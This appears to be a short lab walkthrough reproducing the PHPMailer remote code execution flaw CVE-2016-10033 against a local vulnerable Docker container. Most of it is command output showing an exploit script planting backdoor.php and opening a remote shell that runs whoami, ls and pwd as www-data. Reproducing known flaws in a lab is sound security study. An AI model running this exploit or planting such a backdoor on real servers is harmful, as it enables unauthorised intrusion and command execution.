PHPMailer < 5.2.18 远程代码执行漏洞（CVE-2016-10033）

root@starnight:~# apt-get install docker.io　　　　【安装docker】root@starnight:~# docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033AH00558: apache2: Could not reliably determine the server‘s fully qualified domain name, using 172.17.0.2. Set the ‘ServerName‘ directive globally to suppress this message==> /var/log/apache2/access.log <====> /var/log/apache2/error.log <==[Thu Nov 09 15:11:47.098917 2017] [mpm_prefork:notice] [pid 8] AH00163: Apache/2.4.10 (Debian) configured -- resuming normal operations[Thu Nov 09 15:11:47.101902 2017] [core:notice] [pid 8] AH00094: Command line: ‘/usr/sbin/apache2 -f /etc/apache2/apache2.conf‘==> /var/log/apache2/other_vhosts_access.log <==

root@starnight:~# ifconfig | grep inet ?????????inet addr:172.17.0.1 ?Bcast:0.0.0.0 ?Mask:255.255.0.0 ?????????inet6 addr: fe80::42:4aff:fe88:49e5/64 Scope:Link ?????????inet addr:192.168.0.8 ?Bcast:192.168.0.255 ?Mask:255.255.255.0 ?????????inet6 addr: fe80::a7c0:e1f7:2118:7e6a/64 Scope:Link ?????????inet addr:127.0.0.1 ?Mask:255.0.0.0 ?????????inet6 addr: ::1/128 Scope:Host ?????????inet6 addr: fe80::98a9:5bff:fe1f:b1c9/64 Scope:Link

root@kali:~/penetest/CVE-2016-10033# ./exploit.sh 192.168.0.8:8080[+] CVE-2016-10033 exploit by opsxcq[+] Exploiting 192.168.0.8:8080[+] Target exploited, acessing shell at http://192.168.0.8:8080/backdoor.php[+] Checking if the backdoor was created on target system[+] Backdoor.php found on remote system[+] Running whoamiwww-dataRemoteShell> ls[+] Running lsvulnerableRemoteShell> pwd[+] Running pwd/www